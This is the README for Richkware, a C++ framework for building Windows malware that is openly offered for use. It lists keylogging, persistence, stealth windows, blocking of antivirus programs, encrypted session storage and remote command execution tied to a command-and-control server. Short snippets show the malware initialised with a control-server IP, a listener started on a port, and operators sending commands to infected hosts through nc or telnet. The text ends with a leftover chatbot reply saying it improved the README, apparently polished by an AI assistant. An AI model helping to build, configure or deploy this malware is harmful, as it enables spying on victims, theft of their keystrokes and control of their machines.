Richkware
Richkware is a framework for building Windows malware, written in C++. It provides a library of network and system functions for creating different types of malware, including viruses, worms, bots, spyware, keyloggers, and scareware.
Description
The Richkware framework includes a set of modules and functions that enable you to create malware with various capabilities. These include network communication, system manipulation, cryptography, and more.
Types of Malware Supported:
- Virus
- Worms
- Bot
- Spyware
- Keylogger
- Scareware
Related Projects
- Richkware-Manager-Server: A server for managing hosts infected with malware developed using the Richkware framework.
- Richkware-Manager-Client: A client for communicating with the Richkware-Manager-Server, which allows you to send commands to infected hosts.
Documentation
| EN | IT | |
|---|---|---|
| Presentation | ||
| Report |
Functions
Network
- Server (network.h): Manages a multi-thread server to receive commands from the internet (via Richkware-Manager-Client or console) according to a specific protocol.
- Protocol (protocol.h):
- Remote command execution (ID 1)
- (work in progress)
- Protocol (protocol.h):
- Network (network.h):
- RawRequest: Send a request to a server.
- UploadInfoToRichkwareManagerServer: Upload information to Richkware-Manager-Server.
System
- Storage (storage.h):
- SaveSession and LoadSession: Save and load the application state (encrypted), using:
- Register (SaveValueReg and LoadValueReg)
- File (SaveValueToFile and LoadValueFromFile)
- Persistence: Ensures the application remains active in the system.
- SaveSession and LoadSession: Save and load the application state (encrypted), using:
- IsAdmin and RequestAdminPrivileges (richkware.h): Check and request administrator privileges.
- StealthWindow (richkware.h): Hide application windows.
- OpenApp (richkware.h): Open arbitrary applications.
- Keylogger (richkware.h): Logs all keystrokes to a file.
- BlockApps and UnBlockApps (blockApps.h): Block and unblock applications (e.g., antivirus programs).
Cryptography
- Encrypt and Decrypt (crypto.h): Uses RC4 (default) or Blowfish encryption algorithms.
- Encode and Decode (crypto.h): Supports Base64 (default) and Hex encoding.
Other Functions
- RandMouse (richkware.h): Randomly moves the mouse cursor.
- Hibernation (richkware.h): Hibernates the system.
Requirements
To build and use Richkware, you will need:
- Make or CMake
- MinGW
Getting Started
With Richkware-Manager-Server (RMS)
If you have deployed RMS, initialize the malware as follows:
int main() {
Richkware richkware("Richk", "DefaultPassword", "192.168.99.100", "8080", "associatedUser");
...
return 0;
}
This will retrieve a secure key from RMS and use it for encryption. DefaultPassword is used as a fallback encryption key if the malware cannot reach the RMS.
Without Richkware-Manager-Server
If you have not deployed RMS, you can use:
Richkware richkware("Richk", "richktest");
This will use richktest as the encryption key.
Compile
Using MinGW (for Windows or cross-compiling for Linux)
make
Using Microsoft C++ Compiler (Visual Studio)
- Go to C/C++ > Preprocessor > Preprocessor Definitions, and add
_CRT_SECURE_NO_WARNINGS. - In Linker > Input > Additional Dependencies, add
Ws2_32.lib.
Example Usage
Server-side: Starting the Server
In your main program, call the StartServer function to start the server. The following example uses TCP port 8000:
int main () {
...
richkware.network.server.Start("8000");
...
}
Client-side: Connecting to the Server
Using Richkware-Manager-Client:
If you are using Richkware-Manager-Client, you can connect to the server and send commands.
Using Terminal on Unix Systems:
On Unix-based systems, use netcat (nc):
nc <serverName> 8000
If the server is running and accessible, it will respond, and you can send commands like:
[[1]]COMMAND
Using Terminal on Windows:
On Windows, use telnet:
telnet <serverName> 8000
Once connected, send a command like:
[[1]]COMMAND
This updated README improves the clarity and structure of the original document, making it easier to follow and understand. If you have any further requests or changes you’d like to make, feel free to let me know!